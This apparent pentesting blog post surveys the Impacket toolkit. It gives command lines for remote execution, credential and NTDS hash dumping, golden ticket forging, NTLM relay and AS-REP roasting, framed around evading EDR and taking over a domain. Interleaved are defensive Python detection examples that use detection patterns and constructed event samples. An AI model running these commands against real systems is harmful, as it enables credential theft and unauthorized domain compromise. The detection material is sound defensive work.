Impacket for Pentesters: Weaponizing the Protocols
Impacket is a collection of Python classes for working with network protocols, originally developed by SecureAuth and now maintained by Fortra. But for pentesters, it’s much more — it’s a Swiss Army knife for abusing Microsoft protocols, performing network attacks, and dumping credentials.
Think of it as a set of ready-made weapons for:
- Authenticated attacks (SMB, RDP, MSSQL, WinRM, etc.)
- Credential dumping and reuse
- Remote code execution
- Lateral movement and domain dominance
Impacket makes the boring stuff look cool and the hard stuff look easy.
Installation
To install Impacket:
git clone https://github.com/fortra/impacket.git
cd impacket
pip install .
Make sure you’re in a Python virtual environment, and have the right dependencies (like python3-dev, pip, etc.).
Most Useful Impacket Scripts for Pentesters
Let’s go over the most useful tools in Impacket — what they do, when to use them, and common usage examples.
1. psexec.py
Remote command execution using SMB and valid credentials.
psexec.py DOMAIN/user:pass@target
# Executes commands as the user remotely using SMB service (like PsExec)
Use when:
- You have valid creds (plaintext, hash, or ticket)
- You want a semi-interactive shell over SMB
2. wmiexec.py
Executes commands via WMI (DCOM over port 135 plus a dynamic RPC port; by default the command output is read back over SMB on port 445).
wmiexec.py DOMAIN/user:pass@target
# Quieter than psexec, good for evading AV/EDR
Use when:
- You want to fly under the radar
- Psexec or SMB is blocked/logged heavily
3. smbexec.py
Similar to psexec.py but creates a semi-persistent service.
smbexec.py DOMAIN/user:pass@target
# Uses a service-based method, sometimes bypasses command restrictions
Use when:
- You want a more stable shell
- You want another method in your post-exploitation toolkit
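The three execution tools above leave different traces on the target: psexec.py installs a service whose binary sits on an admin share, smbexec.py installs a service whose ImagePath is a command-shell one-liner, and wmiexec.py spawns cmd.exe with its output redirected to \\127.0.0.1\ADMIN$. The following is an added example written for this post, not Impacket's own code: it classifies Windows Event ID 7045 and 4688 records against those patterns. The indicators are taken from publicly documented detection rules and the event records are constructed samples, not captured logs.

```python
# Added example for this post, not Impacket code: flag Windows events that match
# the execution patterns of psexec.py, smbexec.py and wmiexec.py.
# Indicators follow public detection rules; the events below are constructed.
import re

# Constructed sample events. 7045 = "A service was installed" (System log),
# 4688 = "A new process has been created" with command-line auditing enabled.
SAMPLE_EVENTS = [
    {"id": 7045, "ServiceName": "BTOBTO",
     "ImagePath": r"%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat"},
    {"id": 7045, "ServiceName": "xRaEzOmW",
     "ImagePath": r"\\127.0.0.1\ADMIN$\sMjHqZtL.exe"},
    {"id": 4688, "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1700000000.12 2>&1"},
    {"id": 7045, "ServiceName": "Sysmon64",
     "ImagePath": r"C:\Windows\Sysmon64.exe"},
    {"id": 4688, "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c dir C:\Users"},
]

SMBEXEC_LIKE = "smbexec-style: service ImagePath is a command-shell one-liner"
PSEXEC_LIKE = "psexec-style: service binary loaded from an admin share over loopback"
WMIEXEC_LIKE = "wmiexec-style: process output redirected to \\\\127.0.0.1\\ADMIN$"

# Assumed indicators (from publicly documented detection rules).
SHELL_SERVICE = re.compile(r"%COMSPEC%|\bcmd\.exe\b", re.IGNORECASE)
LOOPBACK_SHARE_BINARY = re.compile(r"^\\\\127\.0\.0\.1\\[A-Z]+\$\\\S+\.exe$", re.IGNORECASE)
WMIEXEC_REDIRECT = re.compile(r"1>\s*\\\\127\.0\.0\.1\\ADMIN\$\\__\d", re.IGNORECASE)


def classify(event):
    """Return a label for an event that matches one of the patterns, else None."""
    if event["id"] == 7045:
        path = event.get("ImagePath", "")
        if SHELL_SERVICE.search(path):
            return SMBEXEC_LIKE
        if LOOPBACK_SHARE_BINARY.match(path):
            return PSEXEC_LIKE
    elif event["id"] == 4688:
        if WMIEXEC_REDIRECT.search(event.get("CommandLine", "")):
            return WMIEXEC_LIKE
    return None


def scan(events):
    """Return (service or process name, label) for every matching event."""
    hits = []
    for ev in events:
        label = classify(ev)
        if label:
            hits.append((ev.get("ServiceName") or ev.get("NewProcessName"), label))
    return hits


if __name__ == "__main__":
    for name, label in scan(SAMPLE_EVENTS):
        print(f"{name}: {label}")
```

The 4688 check only works if command-line auditing is enabled; without it the wmiexec.py pattern is invisible in the Security log, and the service-based tools are the only ones that show up in the System log.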
4. secretsdump.py
Dumps password hashes from remote systems (SAM, LSA, NTDS.dit).
secretsdump.py DOMAIN/user:pass@target
# Extracts NTLM hashes from a target over SMB
Other usage:
secretsdump.py -system SYSTEM -ntds NTDS.dit LOCAL
# Offline hash extraction
Use when:
- You want credentials to use for pass-the-hash, cracking, or reuse
- You compromise a Domain Controller and want to dump all domain user hashes
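When secretsdump.py is pointed at a Domain Controller it pulls the hashes through directory replication (DCSync), which a DC audits as Event ID 4662 carrying the replication control-access rights. The following is an added example written for this post, not Impacket's own code: it flags 4662 records that request those rights from any account that is not a known replicator. The rights GUIDs are the documented Active Directory values; the event records and the list of DC accounts are constructed.

```python
# Added example for this post, not Impacket code: spot DCSync-style replication
# requests in Event ID 4662 records. The GUIDs are the documented AD control-access
# rights; the events and the replicator list are constructed samples.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Assumption: accounts that legitimately replicate (the DCs' machine accounts).
KNOWN_REPLICATORS = {"DC01$", "DC02$"}

# Constructed 4662 records; Properties carries the rights/attribute GUIDs as Windows logs them.
SAMPLE_4662 = [
    {"SubjectUserName": "DC02$", "ObjectType": "domainDNS", "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "jsmith", "ObjectType": "domainDNS", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "jsmith", "ObjectType": "user", "AccessMask": "0x10",
     "Properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}"},
]


def replication_rights_in(properties: str):
    """Names of replication rights referenced in a 4662 Properties field."""
    props = properties.lower()
    return sorted(name for guid, name in REPLICATION_RIGHTS.items() if guid in props)


def dcsync_alerts(events, known_replicators=KNOWN_REPLICATORS):
    """(account, rights) for every replication request from a non-DC account."""
    trusted = {a.upper() for a in known_replicators}
    alerts = []
    for ev in events:
        rights = replication_rights_in(ev.get("Properties", ""))
        if rights and ev["SubjectUserName"].upper() not in trusted:
            alerts.append((ev["SubjectUserName"], rights))
    return alerts


if __name__ == "__main__":
    for account, rights in dcsync_alerts(SAMPLE_4662):
        print(f"{account} requested {', '.join(rights)}")
```

4662 is only generated when "Audit Directory Service Access" is enabled and the domain object carries a SACL for these rights; without that, the replication request leaves no trace in the Security log.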
5. lookupsid.py
Enumerates users and groups via SID lookups.
lookupsid.py DOMAIN/user:pass@target
# Maps SIDs to names; great for enumeration
Use when:
- You want to discover valid usernames
- Enumerating privilege levels remotely
6. rpcdump.py
Dumps information about exposed RPC services.
rpcdump.py target-ip
# Shows bindings and interfaces for RPC, useful for service discovery
Use when:
- Looking for vulnerable RPC services
- Preparing for targeted abuse of DCOM or other RPC-based services
7. dcomexec.py
Executes commands over DCOM objects.
dcomexec.py DOMAIN/user:pass@target
# Uses Distributed COM for execution
Use when:
- SMB and WMI are locked down
- Bypassing certain EDRs
8. smbclient.py
Acts like a Windows net use — browse SMB shares.
smbclient.py DOMAIN/user:pass@target
# Interactive SMB shell to upload, download, list files
Use when:
- Dumping files from exposed shares
- Uploading payloads
9. ticketer.py
Creates golden/silver tickets (Kerberos attack tool).
ticketer.py -nthash <krbtgt_hash> -domain-sid S-1-5-... -domain corp.local Administrator
# Creates a golden ticket
Use when:
- You’ve compromised the krbtgt hash
- You want persistence or domain-level access without detection
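A forged TGT is minted offline, so the KDC never logs a 4768 (TGT issued) for it; the first thing a DC sees is a 4769 (service ticket requested) presented with a TGT nobody issued. The following is an added example written for this post, not Impacket's own code: it correlates 4769 requests against earlier 4768 events for the same user and client address. The events and the 10-hour lifetime are constructed assumptions (10 hours is the default domain policy value).

```python
# Added example for this post, not Impacket code: a correlation heuristic for forged
# TGTs. A 4769 with no matching 4768 inside the TGT lifetime is worth a look.
# The events and the lifetime are constructed/assumed values.
from datetime import datetime, timedelta

# Assumption: the domain's maximum TGT lifetime (default policy is 10 hours).
MAX_TGT_LIFETIME = timedelta(hours=10)

# Constructed Kerberos events from the DCs' Security logs.
SAMPLE_KERBEROS_EVENTS = [
    {"ts": "2024-05-01T08:00:00", "id": 4768, "user": "jsmith", "ip": "10.0.0.5",
     "service": "krbtgt"},
    {"ts": "2024-05-01T08:05:00", "id": 4769, "user": "jsmith", "ip": "10.0.0.5",
     "service": "cifs/fs01.corp.local"},
    {"ts": "2024-05-01T09:00:00", "id": 4769, "user": "Administrator", "ip": "10.0.0.99",
     "service": "cifs/dc01.corp.local"},
    {"ts": "2024-05-02T08:05:00", "id": 4769, "user": "jsmith", "ip": "10.0.0.5",
     "service": "ldap/dc01.corp.local"},
]


def tgs_without_tgt(events, max_lifetime=MAX_TGT_LIFETIME):
    """Return 4769 requests with no 4768 for the same (user, client IP) within the lifetime."""
    last_tgt = {}
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        when = datetime.fromisoformat(ev["ts"])
        key = (ev["user"].lower(), ev["ip"])
        if ev["id"] == 4768:
            last_tgt[key] = when
        elif ev["id"] == 4769:
            issued = last_tgt.get(key)
            if issued is None or when - issued > max_lifetime:
                alerts.append((ev["ts"], ev["user"], ev["ip"], ev["service"]))
    return alerts


if __name__ == "__main__":
    for ts, user, ip, service in tgs_without_tgt(SAMPLE_KERBEROS_EVENTS):
        print(f"{ts} {user}@{ip} requested {service} with no issued TGT on record")
```

Feed it events from every DC, since the TGT and the service ticket are often issued by different ones, and treat the first hours of a log window as noisy: sessions that started before the window look like forgeries to this rule. Renewed TGTs show up as 4770 rather than 4768, which a production version would also fold in.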
10. getTGT.py & getST.py
Request Kerberos tickets directly from the KDC: a TGT with getTGT.py, a service ticket (TGS) with getST.py.
getTGT.py -dc-ip <DC> domain/user:pass
# Gets a TGT from the KDC
getST.py -dc-ip <DC> -spn service/FQDN domain/user:pass
# Gets a TGS for a specific service
Use when:
- Doing Kerberoasting manually
- Using custom tickets in pass-the-ticket attacks
11. ntlmrelayx.py
Relays NTLM authentication to different protocols.
ntlmrelayx.py -tf targets.txt -smb2support
# Set up a relay server to capture and relay NTLM credentials
Use when:
- You can get a victim to authenticate to your machine (e.g., via Responder)
- Relaying to SMB, LDAP, or HTTP
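Relay to SMB only works when the target server does not require message signing, which it advertises in the SecurityMode field of its SMB2 NEGOTIATE response. The following is an added example written for this post, not Impacket's own code: it parses that field from a response and reports whether the server is protected. The byte layouts are those of MS-SMB2; the responses themselves are constructed in the block rather than captured from a real server.

```python
# Added example for this post, not Impacket code: read the SecurityMode of an SMB2
# NEGOTIATE response to decide whether a server is protected against NTLM relay.
# Layouts follow MS-SMB2; the sample responses are constructed here.
import struct

SMB2_HEADER = "<4sHHIHHIIQIIQ16s"          # 64-byte SMB2 packet header
SMB2_NEGOTIATE_BODY = "<HHHH16sIIIIQQHHI"  # fixed part of the NEGOTIATE response
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001
SIGNING_ENABLED = 0x0001
SIGNING_REQUIRED = 0x0002
HEADER_LEN = struct.calcsize(SMB2_HEADER)


def build_negotiate_response(security_mode: int, dialect: int = 0x0311) -> bytes:
    """Constructed SMB2 NEGOTIATE response with an empty security buffer (sample input)."""
    header = struct.pack(SMB2_HEADER, b"\xfeSMB", 64, 0, 0, SMB2_NEGOTIATE, 1,
                         SMB2_FLAGS_SERVER_TO_REDIR, 0, 0, 0, 0, 0, b"\x00" * 16)
    body = struct.pack(SMB2_NEGOTIATE_BODY, 65, security_mode, dialect, 0, b"\x11" * 16,
                       0, 0x800000, 0x800000, 0x800000, 0, 0, HEADER_LEN + 64, 0, 0)
    return header + body


def parse_negotiate_response(data: bytes) -> dict:
    """Extract the dialect and signing flags from an SMB2 NEGOTIATE response."""
    if len(data) < HEADER_LEN + struct.calcsize(SMB2_NEGOTIATE_BODY) or data[:4] != b"\xfeSMB":
        raise ValueError("not an SMB2 message")
    header = struct.unpack_from(SMB2_HEADER, data, 0)
    if header[4] != SMB2_NEGOTIATE or not header[6] & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    body = struct.unpack_from(SMB2_NEGOTIATE_BODY, data, HEADER_LEN)
    security_mode, dialect = body[1], body[2]
    return {
        "dialect": f"0x{dialect:04x}",
        "signing_enabled": bool(security_mode & SIGNING_ENABLED),
        "signing_required": bool(security_mode & SIGNING_REQUIRED),
    }


def relay_exposure(info: dict) -> str:
    """Defender's verdict: a relayed NTLM session only survives where signing is optional."""
    if info["signing_required"]:
        return "protected: server requires SMB signing, relayed sessions are rejected"
    return "exposed: server does not require SMB signing, relayed sessions would be accepted"


if __name__ == "__main__":
    for mode in (SIGNING_ENABLED, SIGNING_ENABLED | SIGNING_REQUIRED):
        info = parse_negotiate_response(build_negotiate_response(mode))
        print(info["dialect"], relay_exposure(info))
```

SMB2 and SMB3 servers always set SIGNING_ENABLED, so the only bit that matters for relay is SIGNING_REQUIRED. The equivalent protections for the other targets in the list are LDAP signing and channel binding for LDAP/LDAPS and Extended Protection for Authentication on HTTP endpoints.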
12. GetNPUsers.py
Kerberos AS-REP roasting — grabs hashes for users not requiring pre-authentication.
GetNPUsers.py corp.local/ -no-pass -usersfile users.txt -dc-ip 192.168.56.101
# Dumps crackable AS-REP hashes for users with 'Do not require Kerberos preauthentication'
Use when:
- Enumerating users for password cracking
- Conducting AS-REP roasting attacks against misconfigured accounts
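The condition this tool looks for is a single bit in userAccountControl (DONT_REQ_PREAUTH, 0x400000), and a successful request shows up on the DC as a 4768 with pre-authentication type 0. The following is an added example written for this post, not Impacket's own code: it audits a set of accounts for that bit and flags 4768 records that match the roasting pattern. The bit values and event fields are the documented Windows ones; the accounts and events are constructed.

```python
# Added example for this post, not Impacket code: two defender-side checks for the
# AS-REP roasting condition. (1) audit userAccountControl for DONT_REQ_PREAUTH;
# (2) flag 4768 records issued with no pre-authentication and RC4 encryption.
# Bit values and event fields are documented Windows values; samples are constructed.
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
DONT_REQ_PREAUTH = 0x400000  # ADS_UF_DONT_REQUIRE_PREAUTH

# Constructed LDAP results (sAMAccountName, userAccountControl).
SAMPLE_USERS = [
    {"sAMAccountName": "svc_backup", "userAccountControl": NORMAL_ACCOUNT | DONT_REQ_PREAUTH},
    {"sAMAccountName": "jsmith", "userAccountControl": NORMAL_ACCOUNT},
    {"sAMAccountName": "old_svc",
     "userAccountControl": NORMAL_ACCOUNT | DONT_REQ_PREAUTH | ACCOUNTDISABLE},
]


def asrep_roastable(users):
    """Enabled accounts whose UAC says Kerberos pre-authentication is not required."""
    return [u["sAMAccountName"] for u in users
            if u["userAccountControl"] & DONT_REQ_PREAUTH
            and not u["userAccountControl"] & ACCOUNTDISABLE]


# Constructed 4768 (TGT requested) records. PreAuthType 0 = no pre-authentication;
# TicketEncryptionType 0x17 = RC4-HMAC, the etype behind the tool's default
# $krb5asrep$23$ output. PreAuthType 2 = PA-ENC-TIMESTAMP (normal logon).
SAMPLE_4768 = [
    {"TargetUserName": "svc_backup", "IpAddress": "192.168.56.50",
     "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    {"TargetUserName": "jsmith", "IpAddress": "192.168.56.20",
     "PreAuthType": "2", "TicketEncryptionType": "0x12"},
    {"TargetUserName": "svc_backup", "IpAddress": "192.168.56.21",
     "PreAuthType": "0", "TicketEncryptionType": "0x12"},
]


def asrep_roast_alerts(events):
    """(client IP, account) for TGTs issued without pre-auth and with RC4 encryption."""
    return [(e["IpAddress"], e["TargetUserName"]) for e in events
            if e["PreAuthType"] == "0" and e["TicketEncryptionType"].lower() == "0x17"]


if __name__ == "__main__":
    print("accounts without pre-auth:", asrep_roastable(SAMPLE_USERS))
    print("roasting-pattern TGT requests:", asrep_roast_alerts(SAMPLE_4768))
```

The first check is the fix: clear the bit on every account the audit returns, and the tool has nothing to request. The second check catches requests while the bit is still set; an AES-encrypted 4768 without pre-auth (the third sample) is less likely to be a roasting attempt but still worth reviewing.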
Tips for Real-World Use
- Combine Responder with ntlmrelayx.py for NTLM relay attacks.
- Use secretsdump.py on a compromised DC to fully own the domain.
- Chain tools together in post-exploitation: e.g., lookupsid → psexec → secretsdump → golden ticket with ticketer.
Defensive Note
Blue teams should monitor:
- Unusual SMB and RPC traffic (ports 445 and 135)
- NTLM relay patterns
- LSASS access or DC sync attempts
- Kerberos ticket anomalies
Final Thoughts
Impacket isn’t just a toolkit — it’s a language for network abuse. Learn it well and you’ll move through networks like smoke. Combine it with enumeration, lateral movement, and privilege escalation strategies and you’ve got yourself a full red team stack.
Impacket Toolkit Tools List
| Tool | Description |
|---|---|
| addcomputer.py | Adds a computer to the domain using credentials. Useful for RBCD and delegation attacks. |
| atexec.py | Executes commands on a remote host via Task Scheduler (like PsExec). |
| dcomexec.py | Executes remote commands via DCOM. Alternative lateral movement technique. |
| dpapi.py | Decrypts DPAPI secrets like credentials stored locally on Windows. |
| esentutl.py | Converts Windows .dit database files to CSV (e.g., NTDS.dit extraction). |
| GetADUsers.py | Queries and dumps Active Directory user info via LDAP. |
| GetNPUsers.py | AS-REP roasting: gets AS-REP hashes for accounts that do not require pre-authentication. |
| GetUserSPNs.py | Kerberoasting: Finds service accounts with SPNs and dumps their TGS hashes. |
| kintercept.py | Captures and displays Kerberos traffic from a target. |
| lookupsid.py | Translates SID to usernames or groups remotely. |
| mimikatz.py | A Python version of mimikatz functions (limited). |
| mqtt_check.py | MQTT protocol testing tool. |
| netview.py | Enumerates shares and sessions on a remote machine (via SMB). |
| nmapAnswerMachine.py | Responds to Nmap probes with fake services (for honeypots/testing). |
| ping.py | ICMP echo requests using pure Python (no system ping dependency). |
| psexec.py | Classic PsExec-like remote command execution over SMB. |
| rbcd.py | Exploits Resource-Based Constrained Delegation attack paths. |
| rdp_check.py | Checks if a system has RDP enabled and reachable. |
| reg.py | Interacts with the Windows registry remotely over SMB. |
| rpcdump.py | Dumps RPC endpoints and services from a target. |
| sambaPipe.py | Demonstrates usage of Samba named pipes. |
| samrdump.py | Dumps SAMR info (users, groups, etc.) from remote systems. |
| secretsdump.py | Dumps SAM hashes, LSA secrets, and cached credentials remotely. |
| smbclient.py | CLI SMB client (like smbclient from Samba suite). |
| smbexec.py | Like psexec.py but uses services for command execution (more stealthy). |
| smbrelayx.py | SMB relay attack tool (deprecated in favor of ntlmrelayx.py). |
| sniffer.py | Packet sniffer for sniffing protocols supported by Impacket. |
| sniff.py | Legacy version of sniffer. |
| split.py | Splits PCAP files by session. |
| ticketConverter.py | Converts Kerberos tickets between formats (ccache/Kirbi). |
| ticketer.py | Creates forged Kerberos TGTs/TGSs (Golden/Silver Ticket creation). |
| trafficrelay.py | TCP traffic relay, useful for redirecting connections during attacks. |
| wmiexec.py | Executes commands remotely using WMI (stealthy, no service creation). |
| wmiquery.py | Executes WMI queries against a target. |
| wsdump.py | Dumps WebSocket messages. |
| xdrlib.py | Tool to parse XDR data (less commonly used). |
Most Commonly Used by Pentesters:
- secretsdump.py
- psexec.py, smbexec.py, wmiexec.py, dcomexec.py
- GetNPUsers.py, GetUserSPNs.py, ticketer.py, rbcd.py
- ntlmrelayx.py (most used — comes with its own options)
- smbclient.py
- lookupsid.py
- reg.py, samrdump.py
